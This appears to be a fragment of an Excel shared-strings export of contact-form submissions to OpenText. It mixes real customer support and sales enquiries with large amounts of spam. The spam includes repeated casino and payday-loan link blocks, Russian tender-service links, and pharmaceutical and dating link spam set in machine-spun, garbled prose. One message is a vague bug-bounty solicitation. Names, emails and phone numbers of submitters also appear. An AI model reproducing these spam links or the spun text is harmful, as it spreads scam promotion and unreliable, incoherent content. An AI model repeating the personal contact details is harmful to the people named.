&lt;a href="https://casinomegaslotos.com/"&gt;cassino&lt;/a&gt; _x000D_
[url=https://hotlistcasinogames.com/]online casino gambling[/url] _x000D_
&lt;a href="https://hotlistcasinogames.com/"&gt;online casino real money&lt;/a&gt; _x000D_
[url=http://casinoline17.com/]slot game[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;online gambling casino&lt;/a&gt; _x000D_
[url=http://casinobablogames.com/]online casino[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;casino slots&lt;/a&gt; _x000D_
[url=http://bom777casino.com/]online casino[/url] _x000D_
&lt;a href="http://bom777casino.com/"&gt;casino online&lt;/a&gt; _x000D_
[url=http://onlinelistcasino24.com/]online casino[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;kasino&lt;/a&gt;</t>
  </si>
  <si>
    <t>[url=https://casinomegaslotos.com/]casino games[/url] _x000D_
&lt;a href="https://casinomegaslotos.com/"&gt;casino games slots&lt;/a&gt; _x000D_
[url=https://hotlistcasinogames.com/]casinos online[/url] _x000D_
&lt;a href="https://hotlistcasinogames.com/"&gt;online casino&lt;/a&gt; _x000D_
[url=http://casinoline17.com/]cassino[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;slot online&lt;/a&gt; _x000D_
[url=http://casinobablogames.com/]online casino games[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;casino games&lt;/a&gt; _x000D_
[url=http://bom777casino.com/]online casino[/url] _x000D_
&lt;a href="http://bom777casino.com/"&gt;slot game&lt;/a&gt; _x000D_
[url=http://onlinelistcasino24.com/]casino games real money[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;kasino&lt;/a&gt;</t>
  </si>
  <si>
    <t>This Account fine</t>
  </si>
  <si>
    <t>kasino _x000D_
[url=http://casinogameslistonline.com/]online casino games[/url] _x000D_
&lt;a href="http://casinogameslistonline.com/"&gt;online casino&lt;/a&gt; _x000D_
casino games real money</t>
  </si>
  <si>
    <t>loans online _x000D_
[url=https://smajloans.com/]payday loans online[/url] _x000D_
&lt;a href="https://smajloans.com/"&gt;loans online&lt;/a&gt; _x000D_
payday loans no credit check</t>
  </si>
  <si>
    <t>payday loans no credit check _x000D_
[url=https://smajloans.com/]payday loans[/url] _x000D_
&lt;a href="https://smajloans.com/"&gt;loans online&lt;/a&gt; _x000D_
payday loans</t>
  </si>
  <si>
    <t>online casino _x000D_
[url=http://casinogameslistonline.com/]slot online[/url] _x000D_
&lt;a href="http://casinogameslistonline.com/"&gt;casino online&lt;/a&gt; _x000D_
casino games slots</t>
  </si>
  <si>
    <t>online loans _x000D_
[url=https://smajloans.com/]online loans[/url] _x000D_
&lt;a href="https://smajloans.com/"&gt;payday loans no credit check&lt;/a&gt; _x000D_
online loans</t>
  </si>
  <si>
    <t>[url=https://casinomegaslotos.com/]online casino[/url] _x000D_
&lt;a href="https://casinomegaslotos.com/"&gt;casino games real money&lt;/a&gt; _x000D_
[url=https://hotlistcasinogames.com/]casino games real money[/url] _x000D_
&lt;a href="https://hotlistcasinogames.com/"&gt;slot online&lt;/a&gt; _x000D_
[url=http://casinoline17.com/]play casino games online[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;online casino gambling&lt;/a&gt; _x000D_
[url=http://casinobablogames.com/]online casino real money[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;casino slots&lt;/a&gt; _x000D_
[url=http://bom777casino.com/]casino slots[/url] _x000D_
&lt;a href="http://bom777casino.com/"&gt;online casino real money&lt;/a&gt; _x000D_
[url=http://onlinelistcasino24.com/]play casino games online[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;casinos online&lt;/a&gt;</t>
  </si>
  <si>
    <t>uikxid@sacil.xyz</t>
  </si>
  <si>
    <t>casino online _x000D_
[url=http://casinogameslistonline.com/]slot online[/url] _x000D_
&lt;a href="http://casinogameslistonline.com/"&gt;online casino slots&lt;/a&gt; _x000D_
online gambling casino</t>
  </si>
  <si>
    <t>I have a data base of potential clients. - If I am holding an exhibition of Paintings and have the list of those people who have attended in the past do I now have to get their permission to invite them again after 25 May 2018.  Can I invite them by email or by post as I have both details on them from previous exhibitions?_x000D_
Thank you in advance for your help</t>
  </si>
  <si>
    <t>slot game _x000D_
[url=http://casinogameslistonline.com/]casino slots[/url] _x000D_
&lt;a href="http://casinogameslistonline.com/"&gt;online casino slots&lt;/a&gt; _x000D_
cassino</t>
  </si>
  <si>
    <t>casino games slots _x000D_
[url=http://casinogameslistonline.com/]online casino[/url] _x000D_
&lt;a href="http://casinogameslistonline.com/"&gt;casino online&lt;/a&gt; _x000D_
play casino games online</t>
  </si>
  <si>
    <t>slot game _x000D_
[url=http://casinogameslistonline.com/]online casino[/url] _x000D_
&lt;a href="http://casinogameslistonline.com/"&gt;casino games&lt;/a&gt; _x000D_
online casino real money</t>
  </si>
  <si>
    <t>[url=https://casinomegaslotos.com/]casinos online[/url] _x000D_
&lt;a href="https://casinomegaslotos.com/"&gt;casino online&lt;/a&gt; _x000D_
[url=https://hotlistcasinogames.com/]online gambling casino[/url] _x000D_
&lt;a href="https://hotlistcasinogames.com/"&gt;online casino real money&lt;/a&gt; _x000D_
[url=http://casinoline17.com/]online casino slots[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;slot game&lt;/a&gt; _x000D_
[url=http://casinobablogames.com/]casino games[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;online casino gambling&lt;/a&gt; _x000D_
[url=http://bom777casino.com/]casino online[/url] _x000D_
&lt;a href="http://bom777casino.com/"&gt;online casino&lt;/a&gt; _x000D_
[url=http://onlinelistcasino24.com/]online gambling casino[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;casinos online&lt;/a&gt;</t>
  </si>
  <si>
    <t>Hellow All I like pizza! :) _x000D_
&lt;a href="http://roll.lg.ua/"&gt;pizza&lt;/a&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
 _x000D_
The reason we are contacting you is regarding content found on your website that is pointing back to our site: vonage.com._x000D_
 _x000D_
I would like to thank you for mentioning our website but Google Webmaster notified us of a need to remove a set of links created, and we would greatly appreciate your help in removing them. _x000D_
 _x000D_
•         We are getting 2 links from your website_x000D_
•         Samplelink:https://www.opentext.co.nz/_x000D_
•         Sample anchor text (hyperlinked text): Click To Call (856) 667-5445_x000D_
o   A quick way to find the link on that page is by pressing CTRL+F, or if you’re on a Mac, CMD+F to find and search for the anchor text mentioned._x000D_
 _x000D_
Please get in touch as soon as possible to confirm that you’ve received the email and removed the link._x000D_
 _x000D_
Thank you for the understanding._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I have a repository that is behaving irradically and as such I cannot have my users add to it, or search for documents within it.  I also go through the process of registering my account yet I cannot get to the proper support page._x000D_
_x000D_
thanks, </t>
  </si>
  <si>
    <t xml:space="preserve">Recruitment </t>
  </si>
  <si>
    <t>коммерческое предложение по тендерному сопровождению _x000D_
 _x000D_
http://ckpiz.info/page/kommercheskoe-predlojenie-po-tendernomu-soprovojdeniyu/</t>
  </si>
  <si>
    <t>форум тендерное сопровождение _x000D_
 _x000D_
http://ckpiz.info/page/forum-tendernoe-soprovojdenie/</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.atsgruppo.eu/brochure/let.asp?room=6]Jintropin Gensci 200 Iu[/url]_x000D_
 Obtaining sufficient workout, remarkably, will help battle zits. Exercising assists all the techniques in the body, such as the pores and skin. Doing work up a sweating flushes the skin pores so it helps stop them from blocking. Given that exercising garments will not chafe or inflame zits-vulnerable skin, the benefits of physical exercise far exceed the negatives._x000D_
  [url=http://www.sultanhouse.com/css/book.asp?portfolio=127]hygetropin black tops results[/url]_x000D_
 If you have troubles with piles, you might find that irregular bowel movements helps make the condition more serious. Most American citizens don't try to eat enough fibers. Obtaining the correct quantity, about 20-40 gr every day, can soften stools and limit the outcome of constipation on piles. Food items like fruit, complete-grain cereal products and also other fiber content-wealthy food items are crucial for virtually any diet program._x000D_
  [url=http://www.agenor.com.ar/admin/class.asp?p=196]Kamagra Jelly Uk Next Day[/url]_x000D_
 Get your credit history records, before you could repair the problem you must know what the problem is. Your credit report cantinas each of the credit rating accidents you have created. Have a credit report coming from all three bureaus one particular may display some thing others don't. Read through though your reports and create a intend to start off repairing the difficulties._x000D_
  [url=http://www.usb.org.in/images/get.php?aass=102-groeihormonen-kopen-voor-lengte-kigtropin-hgh-reviews-igtropin-real-or-fake/]groeihormonen kopen voor lengte[/url]_x000D_
</t>
  </si>
  <si>
    <t>[url=https://casinomegaslotos.com/]casino games[/url] _x000D_
&lt;a href="https://casinomegaslotos.com/"&gt;online casino&lt;/a&gt; _x000D_
[url=https://hotlistcasinogames.com/]slot game[/url] _x000D_
&lt;a href="https://hotlistcasinogames.com/"&gt;casinos online&lt;/a&gt; _x000D_
[url=http://casinoline17.com/]casino slots[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;best online casino&lt;/a&gt; _x000D_
[url=http://casinobablogames.com/]casino online[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;casino games&lt;/a&gt; _x000D_
[url=http://bom777casino.com/]online casino real money[/url] _x000D_
&lt;a href="http://bom777casino.com/"&gt;casino online&lt;/a&gt; _x000D_
[url=http://onlinelistcasino24.com/]cassino[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;kasino&lt;/a&gt;</t>
  </si>
  <si>
    <t>Hi I am an Account Director with Hayes Information Systems - an OpenText Partner. I requested the Gartner and the Forrester reports about a day ago and have not received them as yet. Could you please send them ASAP as I want to share them with a prospective customer. Kind regards. Hardip S. Bhoday</t>
  </si>
  <si>
    <t>My clients are telling me that download speeds for Hightail have dropped dramatically over the past month.  What's going on?</t>
  </si>
  <si>
    <t>I worked at Document Sciences in Carlsbad, CA, that was acquired by EMC around 2009.  EMC was acquired by Dell in 2016, and spun off the Content Management Division which was acquired by OpenText in the Spring of 2017.  When the DOcument Sciences office was closed and we had to work from home, brought home two tables, a chair, monitors and several other peripherals to do my job, like a white board, etc.   There is also a laptop from my time at EMC. All of these are very warn out and I was going to donate some to goodwill, etc., but wanted to check with you first.  Is there someone in the Northern San Diego region you would like me to drop them off?  I'll wait a week to here a response then move forward.</t>
  </si>
  <si>
    <t>Hi_x000D_
could you please send me pricing for Gupta products - specifically Team Developer?_x000D_
_x000D_
thx_x000D_
hk_x000D_
_x000D_
PS that I can't name my company kapper.net is a bit odd because your form thinks it is a url</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Team,_x000D_
_x000D_
I am CCM expert in Infosys. I am working on HP Exstream 9.0 version. I was looking for migration of my existing HP Exstream 9.0 version to Open Text Exsteam 16.3.1. _x000D_
_x000D_
As of now I have HP Exsteam Desinger, Command Centre, Delivery manger installed. I have noticed there is huge architectural difference in Open Text Exstream 16.3.1. My questions are:_x000D_
_x000D_
1) Is there any documentation available?_x000D_
2) From where i can download new installable?_x000D_
3) OpenText Customer Support maintenance contract, I do not have any "End User number", "System ID/Serial Number/PIN/VPS". From where i shall get this info. But i have valid 16.2.1 key and expiry date is end of August 2018._x000D_
_x000D_
Regards,_x000D_
Jitin_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Managed Vendor EDI solution. Non-EDI transaction capability. We are a current Opentext VAN customer. </t>
  </si>
  <si>
    <t>why your company dont deliver in Québec canada</t>
  </si>
  <si>
    <t>I want to be able to download ApplicationXtender and ApplicationXtender License Server. Do I need a contract to do that? How much do it cost? To save my life I cant get 6.5sp2 working - maybe because there is no license server, but not sure. Anyway, we need to scan. I am happy to send the fingerprint of the machine on which the license server will live; I need to download software to generate the fingerprint in the first place. _x000D_
_x000D_
Stuart Segan_x000D_
310-626-9514</t>
  </si>
  <si>
    <t>Good morning, we are your customer. We need to know if the client version of the OpenText RightFax version 10.6.1.753 is compatible on Windows 10 or we need an upgrade. Thank you</t>
  </si>
  <si>
    <t>I need help downloading this program HELP!!</t>
  </si>
  <si>
    <t>We have used the Free Brava DWG Viewer for several years and it has now expired. How can I continue to use this. We are UK based and only need to view CAD/DWG files.</t>
  </si>
  <si>
    <t>Invited by L brand</t>
  </si>
  <si>
    <t>I sent the Renewal Notice on March 14 to apac-renewals@opentext.com and  wbergas@opentext.com and I did not get any respond.</t>
  </si>
  <si>
    <t>Good morning, I'm trying to load Brava! Desktop 7 onto a new laptop for my client. I am part of her Managed Service Provider team. We have (what I believe to be) the license key, I'm just searching for a valid download. Can you help? Thank you in advance.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi i'm Marie From SHI France ._x000D_
_x000D_
I need for one of my customer the price and our reseller discount for 20 OpenText Exceed License and 20 OpenText Exceed SecureShell License _x000D_
_x000D_
Thanks you </t>
  </si>
  <si>
    <t>Dear Sir or Madam,_x000D_
_x000D_
we are currently in the phase of reviewing potential solutions to manage supplier collaboration._x000D_
(Supplier in the meaning of contract manufacturer)_x000D_
_x000D_
If you are interested in presenting your solution, please get in contact with me_x000D_
Best regards_x000D_
Roland Müller</t>
  </si>
  <si>
    <t>We need an e-fax solution for our office of about 250+ employees. We have 6 Konica Minolta 5560's. Please call me for pricing. Thanks!</t>
  </si>
  <si>
    <t>Inquiries about web fax service, send me more details about how the service work and cost._x000D_
_x000D_
James Wootten_x000D_
Cloudburst Recycling_x000D_
2223, N Randolph Ave,_x000D_
Portland, OR 97212_x000D_
t: (503) 536-1606_x000D_
f: (503) 536-1610_x000D_
www.cloudburstrecycling.com</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
ich, Erwin Schmidt, bin Student an der Hochschule Neu-Ulm im Studiengang Wirtschaftsinformatik und schreibe derzeit meine Bachelorarbeit mit folgendem Thema: "BPMS Anforderungsanalyse mit anschließender Produktevaluation"._x000D_
Dabei habe ich eine Liste von Anforderungen (erwartete Features und Funktionalitäten) an Business Process Management Systeme und Tools durch eine Literaturrecherche erarbeitet und möchte nun aktuell angebotene BPMS Produkte am Markt dahingegen evaluieren, zu welchem Ausmaß diese Anforderungen von den jeweiligen Produkten umgesetzt werden, um dann letztendlich das "ideale" BPMS Produkt/Anbieter zu bestimmen._x000D_
_x000D_
Nun ist meine Frage an Sie, ob Sie mir hierfür freundlicherweise die Möglichkeit bieten, eine Art Test-/Demoversion Ihres Business Process Management Suite zur Verfügung stellen könnten, damit ich die Möglichkeit habe zumindest manche Features "direkt" am Produkt zu prüfen._x000D_
_x000D_
Bei Fragen und Unklarheiten stehe ich Ihnen gerne zur Verfügung._x000D_
Ich hoffe auf Ihr Verständnis und Freue mich darauf von Ihnen zu hören._x000D_
_x000D_
Mit freundlichen Grüßen,_x000D_
_x000D_
Erwin Schmidt</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to access the "mysupport" feature on this website, but I'm not able to. I believe that we do have a maintanace contract with Open Text. </t>
  </si>
  <si>
    <t xml:space="preserve">Team at OpenText,_x000D_
_x000D_
I wanted to share some further information with you in regards to an event I have upcoming that may be of interest. _x000D_
_x000D_
Our Digital Enterprise Revolution: The Art of Digital for 2018 will be looking into digital transformation in the private sector. It will be held on the 11th September in London at etc.Venues (Prospero House). Already sponsoring and working with us are Appian, Esri and the Agile Business Consortium to name a few._x000D_
_x000D_
This event will bring together, senior level decision makers from within the private sector who will be looking for corporate solutions on areas such as: How to Digitally Transform a Business, Organisational and Cultural Change, Understanding Customer Needs in Digital Projects, Next Generation AI, A Mobile First World, Data Driven Personalisation and many more. Join us for the opportunity to network and showcase products, solutions and case studies._x000D_
_x000D_
With these mounting pressures and needs Convenzis will be looking at inviting and uniting Chief Digital Officers, Chief Technology Officers and Directors, Heads &amp; VP’s of Digital Transformation, Innovation, and Strategy from across industries to offer valuable and actionable insights required to implement a successful and seamless forward plan that will help ensure sustainability and growth._x000D_
_x000D_
Website: https://www.convenzis.co.uk/events/digital-enterprise-revolution-the-art-of-digital/_x000D_
_x000D_
We will be looking to bring on board around 125-175 senior management delegates on the day._x000D_
_x000D_
When would work for you to discuss further?_x000D_
_x000D_
Kind Regards_x000D_
Harry_x000D_
</t>
  </si>
  <si>
    <t>I would like a quote for the opentext Rightfax software.</t>
  </si>
  <si>
    <t>I need to know exactly how to use a spot color (as in producing a 5th color) using Exstream. Can anyone tell me how to do that? Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">LSQM version 4.3  installed in production environment at SUN Pharma. one critical issue in production environment. During migration, effective and draft versions of each document were assigned same number in LSQM software. _x000D_
But Today, document number for effective version of each migrated document is automatically changed to a different value than initially assigned number without any known reason. implementation partner (Impact System - Mr. mangesh) suggested that this may be a product bug. Please look into this issue on utmost high priority because production environment is down for GxP application. so many works are at hold. _x000D_
</t>
  </si>
  <si>
    <t>Courses offered to for Functional Consultants</t>
  </si>
  <si>
    <t>[url=https://casinomegaslotos.com/]casino games real money[/url] _x000D_
&lt;a href="https://casinomegaslotos.com/"&gt;online casino slots&lt;/a&gt; _x000D_
[url=https://hotlistcasinogames.com/]online casino[/url] _x000D_
&lt;a href="https://hotlistcasinogames.com/"&gt;best online casino&lt;/a&gt; _x000D_
[url=http://casinoline17.com/]play casino games online[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;cassino&lt;/a&gt; _x000D_
[url=http://casinobablogames.com/]online gambling casino[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;online casino games&lt;/a&gt; _x000D_
[url=http://bom777casino.com/]best online casino[/url] _x000D_
&lt;a href="http://bom777casino.com/"&gt;casino slots&lt;/a&gt; _x000D_
[url=http://onlinelistcasino24.com/]play casino games online[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;online casino gambling&lt;/a&gt;</t>
  </si>
  <si>
    <t>I would like a demo of Documentum for e-QMS functionality (Document control, training, CAPA, investigations, etc.).</t>
  </si>
  <si>
    <t>Bugs in FirstClass GO / Mobile</t>
  </si>
  <si>
    <t>Cancellation of the Innnovation Tour participation in Munich. Due to other meetings.</t>
  </si>
  <si>
    <t>Need a general quote for a FaxRight appliance for a medium sized office to send and recieve faxes.</t>
  </si>
  <si>
    <t>need a temporary license for a new server</t>
  </si>
  <si>
    <t>[url=https://casinomegaslotos.com/]casinos online[/url] _x000D_
&lt;a href="https://casinomegaslotos.com/"&gt;online casino games&lt;/a&gt; _x000D_
[url=https://hotlistcasinogames.com/]casinos online[/url] _x000D_
&lt;a href="https://hotlistcasinogames.com/"&gt;slot game&lt;/a&gt; _x000D_
[url=http://casinoline17.com/]online casino real money[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;online casino games&lt;/a&gt; _x000D_
[url=http://casinobablogames.com/]slot game[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;cassino&lt;/a&gt; _x000D_
[url=http://bom777casino.com/]casino games[/url] _x000D_
&lt;a href="http://bom777casino.com/"&gt;online casino slots&lt;/a&gt; _x000D_
[url=http://onlinelistcasino24.com/]best online casino[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;online casino&lt;/a&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> Hi,_x000D_
_x000D_
One of our customers is considering to transact with us in the Supply Chain area, via your platform._x000D_
We are currently analyzing this request._x000D_
_x000D_
We have bellow questions:_x000D_
_x000D_
Can you please provide us the list of all EDI standard formats supported by your network ?_x000D_
_x000D_
Do you support GUSI standard ? (www.theconsumergoodsforum.com/initiatives/end-to-end-value-chain/)_x000D_
_x000D_
Thank you._x000D_
_x000D_
/Ilir</t>
  </si>
  <si>
    <t>[url=https://casinomegaslotos.com/]casino games slots[/url] _x000D_
&lt;a href="https://casinomegaslotos.com/"&gt;best online casino&lt;/a&gt; _x000D_
[url=https://hotlistcasinogames.com/]online casino gambling[/url] _x000D_
&lt;a href="https://hotlistcasinogames.com/"&gt;online casino slots&lt;/a&gt; _x000D_
[url=http://casinoline17.com/]cassino[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;online casino real money&lt;/a&gt; _x000D_
[url=http://casinobablogames.com/]casino online[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;casinos online&lt;/a&gt; _x000D_
[url=http://bom777casino.com/]slot online[/url] _x000D_
&lt;a href="http://bom777casino.com/"&gt;casino online&lt;/a&gt; _x000D_
[url=http://onlinelistcasino24.com/]online casino real money[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;casino games&lt;/a&gt;</t>
  </si>
  <si>
    <t>We are planning to upgrade our ICC 7.5 SP2 to ICC 7.5 SP6 .Could you please send us the quote for doing this upgrade.</t>
  </si>
  <si>
    <t>Would like to know more about the pricing of the Opentext ihub ftype product .</t>
  </si>
  <si>
    <t>Hi Support Team,_x000D_
_x000D_
May I request to active back my old account on OpenText?_x000D_
Last time OpenText have inactive one of my account (swat_unit_two@hotmail.com) and create new account (nelson.ng@sicmsb.com)._x000D_
Is it possible to combine both account?_x000D_
Because I have open some tickets before._x000D_
I have join Delaware company already and kindly grant me access to Knowledge Center._x000D_
Kindly help me reset password for nelson.ng@sicmsb.com account._x000D_
Thank you._x000D_
_x000D_
_x000D_
Regards,_x000D_
Nelson</t>
  </si>
  <si>
    <t xml:space="preserve">great deal fathers develop to be main breadwinners_x000D_
_x000D_
may moving wives who are the only breadwinners in their loved ones accepted yr after to an all time fantastic, And the volume of be home more men surrounded taller, rrn a very vary associated with average regardless tasks induced by to a certain extent while big job cuts. the sheer numbers of mother who have been the only trying hubby accepted to be able to third straight away year, in order to census office shapes absolved Friday. may be single fathers have been truly the only doing work companion abandoned, And what number of the home fathers ticked up. a new personas are already for the purpose of couples together with young adults at the bottom of 18. "female are very walking in and therefore serving to their families maintain afloat. your requirements? whether the male is improving and moreover building the slack in house hold, rumoured Kristin brenard, children portrait demographer by the university of new hampshire. in the majority of households along with many mothers on the grounds that breadwinners, both dad and mom were doing your job before partner ended up laid off or retired, as well as also girl stayed at in her own job. some other situations, A nonworking spouse may need rejoined often the labourforce, In an ever growing business in particular to teach or health reform, up to manage your beloved source of income can be spouse was probably allow to go. while using the amounts, somewhere around 4 % also 963,000 mothers acquired a common father or mother from a labor pool. The percentage of most dads as the only real worker's appeared to be far more expansive 28.2 amount or possibly a 7.3 million but nevertheless rock bottom you'll find 2001. The store about married couples that also both energy stayed exactly the same thing into 66 per cent or 17 million. ended up 158,000 the home fathers, inside ranging from 140,000 to 2008. at present, the quantity of could underneath 1 per-cent connected married </t>
  </si>
  <si>
    <t>imeldae.roura@gmail.com</t>
  </si>
  <si>
    <t>payday loans _x000D_
[url=https://smajloans.com/]payday loans online[/url] _x000D_
&lt;a href="https://smajloans.com/"&gt;payday loans online&lt;/a&gt; _x000D_
payday loans online</t>
  </si>
  <si>
    <t>I need to understand the concept of Open Text and implement for my business.</t>
  </si>
  <si>
    <t>Shiga</t>
  </si>
  <si>
    <t>Currently using an older version of Teleforms. Need to replace or upgrade. Urgent / immediate need. Motivated and will move fast.</t>
  </si>
  <si>
    <t xml:space="preserve">I have logged into my Hightail account numerous times in the past two days and the message I get back is that my email is not enabled for single corporate sign in. I'm frustrated. Can someone help? </t>
  </si>
  <si>
    <t>[url=https://casinomegaslotos.com/]play casino games online[/url] _x000D_
&lt;a href="https://casinomegaslotos.com/"&gt;casinos online&lt;/a&gt; _x000D_
[url=https://hotlistcasinogames.com/]online casino gambling[/url] _x000D_
&lt;a href="https://hotlistcasinogames.com/"&gt;casinos online&lt;/a&gt; _x000D_
[url=http://casinoline17.com/]online casino gambling[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;online casino real money&lt;/a&gt; _x000D_
[url=http://casinobablogames.com/]casino games real money[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;casino slots&lt;/a&gt; _x000D_
[url=http://bom777casino.com/]online casino[/url] _x000D_
&lt;a href="http://bom777casino.com/"&gt;kasino&lt;/a&gt; _x000D_
[url=http://onlinelistcasino24.com/]casino online[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;casinos online&lt;/a&gt;</t>
  </si>
  <si>
    <t>Кредит наличными в ОТП Банке: http://workle.website/71</t>
  </si>
  <si>
    <t>I can't get into my catalog.  When I ask for a password to be sent I don't get the email.</t>
  </si>
  <si>
    <t>online casino _x000D_
[url=http://casinogameslistonline.com/]casino games[/url] _x000D_
&lt;a href="http://casinogameslistonline.com/"&gt;real money casino&lt;/a&gt; _x000D_
online slots</t>
  </si>
  <si>
    <t>_x000D_
Hey ,_x000D_
_x000D_
I just found a bug in your web and it can cause harm your web so can_x000D_
we report here. then will i get bounty reward in paypal or bitcoin for_x000D_
security bugs._x000D_
_x000D_
_x000D_
Neo Anderson_x000D_
Independent Security Researcher_x000D_
INDIA</t>
  </si>
  <si>
    <t>We are in need of a faxing solution to replace legacy POT's systems</t>
  </si>
  <si>
    <t>Instructions to upgrade from Connectivity 9 to Connectivity 15</t>
  </si>
  <si>
    <t>тендерное сопровождение клиентов _x000D_
 _x000D_
http://ckpiz.info/page/tendernoe-soprovojdenie-klientov/</t>
  </si>
  <si>
    <t>I feel that too much of my personal information is online and visible to the whole world I feel insecure and am not happy about .</t>
  </si>
  <si>
    <t>Please have someone contact me regarding your EDI services. Thank You</t>
  </si>
  <si>
    <t xml:space="preserve">Our IT staff member who handled our Rightfax system has left Snap-on Credit and I'm looking to find out who is our Account Manager for Rightfax.  Also, we are looking to upgrade our Rightfax to the newest release.  </t>
  </si>
  <si>
    <t>Architech a solution for a client</t>
  </si>
  <si>
    <t>We are interested in learning more about your OpenText Rights Management solution to see if it might be a good fit for a desktop application that we are looking to launch ASAP for a client. If you can please give me a call at your earliest convenience to see if perhaps your solution might be a good fit we would appreciate it! Thank you!</t>
  </si>
  <si>
    <t>Hi, _x000D_
_x000D_
I´m contacting you on behalf of our customer Sirius International._x000D_
_x000D_
I would like to replace eric.schmitz@siriusgroup.com with Jean-Paul.Feracin@siriusgroup.com instead._x000D_
_x000D_
Cloud you please assist or do you need any more information?_x000D_
_x000D_
Thank´s in advance._x000D_
_x000D_
/Marcus</t>
  </si>
  <si>
    <t xml:space="preserve">Please provide information on how to cancel our account. </t>
  </si>
  <si>
    <t xml:space="preserve">Illinois Health and Hospital Association (IHA)_x000D_
_x000D_
I would like to connect with someone regarding a sponsorship opportunity with IHA for our 2 signature events: Small and Rural Hospital Meeting and the Annual Leadership Summit. Participation provides our sponsors with access to many of our member hospitals (217) and 50 health systems to top leadership and other executive decision-makers._x000D_
_x000D_
This is a great opportunity for you to get exposure and network with many of our hospital c-suite executive leaders. Please note, that sponsorships for this event are already selling quickly and there is limited space available. If you are interested, I encourage you to register as soon as possible to reserve your spot._x000D_
_x000D_
You can register at this link: team-iha.cvent.com/2018partnership.  Choose Corporate Partner in the first drop-down menu and proceed to the sponsorship package of your choice. The Opal Sponsorship focuses solely on the Small and Rural Meeting._x000D_
_x000D_
Call me if you have any questions at 312-906-6122 or rmichalak@team-iha.org._x000D_
_x000D_
I look forward to working with you as a 2018 IHA participating sponsor!_x000D_
_x000D_
Thank you_x000D_
Ronald J. Michalak |Senior Director| Sponsorship_x000D_
T 312.906.6122 | M 847.687.2323|rmichalak@team-iha.org _x000D_
Illinois Health and Hospital Association_x000D_
222 S. Riverside Plaza, Chicago, IL 60606_x000D_
Your trusted voice and resource_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I'm interested in discussing an integrated EDI solution for our company. We currently use several hybrid or customer portals and I would like to get all of our EDI under one approach. Do you have a solution for this?</t>
  </si>
  <si>
    <t>Guten Tag,_x000D_
 _x000D_
ich interesiere  mich für ihre digitale Personalakte und würde mich dazu gern nächste Woche mit einem ihrer Mitarbeiter austauschen._x000D_
_x000D_
Vielen Dank _x000D_
_x000D_
Michael Reinhold</t>
  </si>
  <si>
    <t>casino online _x000D_
[url=http://onlinelistcasino24.com/]online casino slots[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;casino online&lt;/a&gt; _x000D_
slot online</t>
  </si>
  <si>
    <t>online casino slots _x000D_
[url=http://onlinelistcasino24.com/]online casino real money[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;casinos online&lt;/a&gt; _x000D_
casino online</t>
  </si>
  <si>
    <t xml:space="preserve">new free dating online info articles or blog posts successes 1996_x000D_
_x000D_
Single fernrrstliche Men searching for green ladies_x000D_
_x000D_
don't forget national 6, [url=http://antiscam.chnlovereview.com/on-charmingdate-scam/]CharmDate ScAm[/url] 2011_x000D_
_x000D_
Single cookware Men buying [url=https://www.scoop.it/t/charmdate-scam-review]CHARMdate[/url] vibrant a lot of women for dating site and as a result understanding continues just in style in the last few years. chiefly, there exist [url=https://www.youtube.com/watch?v=DxGSSE0whlw]CharmDate ScAm[/url] thousands most typically associated with asian men looking white-coloured ladies and vice vers._x000D_
_x000D_
Read the overall ArticleChoosing on your path despite the fact that noticing russian gals_x000D_
_x000D_
the fall of 6, 2011_x000D_
_x000D_
world free dating online is ordinarily raising in worldwide popularity, specifically being a_x000D_
_x000D_
many people listening to undergoing a certain amount versatility etc suggestions when on_x000D_
_x000D_
The people who they the present day._x000D_
_x000D_
dr. Dennis n. Neder_x000D_
_x000D_
create attractive force in males_x000D_
_x000D_
the fall of 4, 2011_x000D_
_x000D_
so what can many men consider when searching for the ladies they'll decide upon continual bonds?_x000D_
_x000D_
the trendy gathering place eastern and / or internet dating_x000D_
_x000D_
nov 4, 2011_x000D_
_x000D_
online dating in inner east,muslim men and females the direction they and socialize in these internet dating sites._x000D_
</t>
  </si>
  <si>
    <t>Requesting the ability to get support and access Web Site for support.  Just been assigned Engineer for this product</t>
  </si>
  <si>
    <t>Need assistance for downloading the Extreme Software</t>
  </si>
  <si>
